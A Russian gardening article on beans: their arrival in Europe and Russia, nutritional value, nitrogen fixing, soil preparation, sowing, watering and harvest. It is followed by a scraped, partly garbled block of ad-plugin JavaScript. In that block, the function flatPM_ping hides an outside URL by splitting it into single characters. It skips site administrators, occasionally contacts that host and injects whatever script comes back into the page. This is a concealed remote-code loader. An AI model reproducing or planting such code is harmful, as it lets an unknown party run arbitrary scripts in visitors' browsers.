В Европу семена фасоли привез из Америки Христофор Колумб. Но как пищевой продукт европейцев она не заинтересовала. На протяжении почти двух веков они делали из нее косметические кремы и маски, которые стоили очень дорого. Ее также высаживали в цветники как декоративное растение. А вот первые блюда из фасоли начали готовить французы и англичане в середине XVIII века.

В это же время, именно из Франции, по указу императрицы Елизаветы Петровны фасоль была завезена в Россию под названием «французские бобы». Еще одно название того времени «турецкие бобы» свидетельствует о том, что фасоль в Россию могли привозить и из Турции.

Фасоль пришлась по вкусу и знати, и простым крестьянам. Жители Ярославской губернии придумали рецепт первого лукового супа с фасолью, который впоследствии стал очень популярным.

ЧЕМ ПОЛЕЗНА ФАСОЛЬ

Главное достоинство фасоли – высокое содержание растительного белка, который с успехом способен заменить белок животный в рационе человека.

Но и по содержанию витаминов и полезных веществ фасоль занимает лидирующее место среди других овощей.

В стручках и бобах содержится практически весь витаминный алфавит: А, вся группа В, С, Е, D, К, РР, каротин. В них также присутствуют: калий, натрий, кальций, фосфор, магний, железо, йод, селен, германий, хром.

Бобы богаты сахарозой, органическими и жирными кислотами, клетчаткой, флавоноидами, кумаринами, аминокислотами, в том числе аргинином, понижающим сахар в крови.

Фасоль – ценнейший овощ, который разрешается употреблять в любом диетическом питании.

ОСОБЕННОСТИ ФАСОЛИ

Фасоль относится к азотфиксирующим культурам. На ее мощной корневой системе расположено множество клубеньков с бактериями, которые усваивают азот из воздуха и накапливают его в корнеобитаемом слое.

Она практически полностью обеспечивает себя азотными удобрениями, которые впоследствии остаются на грядке для последующих овощей. На одном месте фасоль выращивают не более 5 лет.

После нее на грядку можно высевать любые овощи. Лучшие предшественники для фасоли – томаты, баклажаны, перец, морковь, свекла, лук, чеснок, кабачки, огурцы.

Фасоль – самоопыляющаяся культура. Однако если рядом высадить несколько сортов, то урожаи их будут выше.

Фасоли необходимо яркое солнечное освещение в течение всего дня. Тогда она будет хорошо расти и развиваться. В тени урожаи получатся очень скудными. Стручки появятся поздно, а могут вообще не образоваться.

Растение это теплолюбивое. Оптимальная температура для ее нормального развития – +24 градуса, поэтому не следует торопиться с высадкой семян на грядку. Лучшие сроки посадки – с 6 по 10 июня.

Фасоль любит влагу, но при ее избытке может начаться массовое опадение цветков и завязей.

Семена фасоли могут храниться очень долго. Они сохраняют всхожесть до 8 лет.

КАК ПОСАДИТЬ И ВЫРАСТИТЬ ФАСОЛЬ

Как и все овощные культуры, фасоль предпочитает плодородные, легкие, рыхлые почвы с нейтральной реакцией. Мы уже писали об этом в статьях: «Как вырастить морковь», «Как вырастить перец», «Как вырастить баклажан».

Растение не терпит застоя дождевых вод, поэтому его высаживают на грядках. При перекопке на 1 кв. м добавляют: 2 ведра перегноя, ведро песка, литровую банку древесной золы, стакан доломитовой муки, 2 ст. ложки суперфосфата и 1 ст. ложку сернокислого калия.

Перед посевом семена замачивают на трое суток, размещая их между двумя слоями марли, хорошо намоченной раствором «Циркона» или «Цитовита». Раствор несколько раз подливают, чтобы марля не пересыхала.

Семена раскладывают в бороздки глубиной 3 см на расстоянии 8 см друг от друга. Расстояние между рядами – 30 см. После посева бороздки засыпают перепревшим навозом или компостом и грядки хорошо поливают.

Чтобы ускорить появление ростков, посевы рекомендуется накрыть прозрачной пленкой.

Фасоль не требует многочисленных подкормок. Все необходимые питательные вещества она получила при посадке. Азот ее корневая система добывает из воздуха. Однако пару раз в первую половину лета рекомендуется удобрить ее раствором навозной жижи.

Фасоли необходимы регулярные поливы, чтобы земля под растениями всегда была влажной. После каждого проводят неглубокое рыхление почвы под кустами, чтобы не образовалась корка, так как корневой системе растения необходим постоянный доступ кислорода к корням.

После начала плодообразования поливы и подкормки прекращают, так как сильное разрастание листьев препятствует созреванию урожая.

Стручковой фасоли необходимы опоры, так как стебли у нее довольно тонкие. Можно рядом с растениями поставить колья. Можно соорудить шпалеру.

Собирать лопатки фасоли начинают через полторы недели после образования завязей, когда стручки достигнут размеров: 12 см в длину и 1 см в ширину. Обрывают их, как правило, один раз в неделю. Стручки нужно не срывать, а срезать, чтобы не повредить растения.

ИЗ КАКИХ СОРТОВ МОЖНО ВЫРАСТИТЬ ЛУЧШУЮ ФАСОЛЬ

Мы предлагаем наши лучшие сорта овощной и стручковой фасоли.

Эти сорта отличаются повышенным содержанием, белка, витаминов и полезных веществ. К тому же они устойчивы к основным болезням бобовых культур.

Вы видите, что вырастить фасоль совсем не сложно. А сколько от нее пользы. Посадите ее, и убедитесь в этом сами!

Поделитесь знаниями:

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};